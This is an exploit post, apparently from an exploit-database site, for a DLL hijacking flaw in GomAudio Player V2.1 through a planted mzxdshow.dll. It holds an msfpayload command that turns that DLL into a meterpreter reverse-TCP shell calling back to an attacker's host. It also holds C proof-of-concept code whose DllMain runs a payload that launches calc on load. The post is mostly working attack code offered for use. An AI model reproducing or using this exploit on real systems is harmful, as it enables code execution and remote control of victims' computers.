facebook facebook twitter rss

GomAudio_Player V2.1 DLL Hijacking

Author: VH4Ck , Published: 10-05-2015
/*

#[+] Author: VH4Ck

#[+] Exploit Title: GomAudio_Player V2.1 DLL Hijacking

#[+] Date: 5/5/2015

#[+] Vendor : http://audio.gomlab.com/eng/download/download_log.gom?utype=CMain

#[+] Tested on: Windows XpSP3

#[+]Vulnerable DLL---> mzxdshow.dll

#[+]Make dll payload with metasploit:> msfpayload windows/meterpreter/reverse_tcp LHOST=XXX.XXX.X.X LPORT=XXXX D > mzxdshow.dll

#[+] GR33TZ : To Bedo Mado and all my friends

#[+] facebook : www.facebook.com/karim.shoair

*/

Proof of Concept (PoC):
============================

#include <windows.h>

int evil() {

MessageBoxA(0, "Calculator will open now", "GomAudio_Player V2.1 DLL Hijacking Bug", MB_OK);

WinExec("calc", 0);

exit(0);

return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) {

evil();
return 0;

}

Like us on Facebook :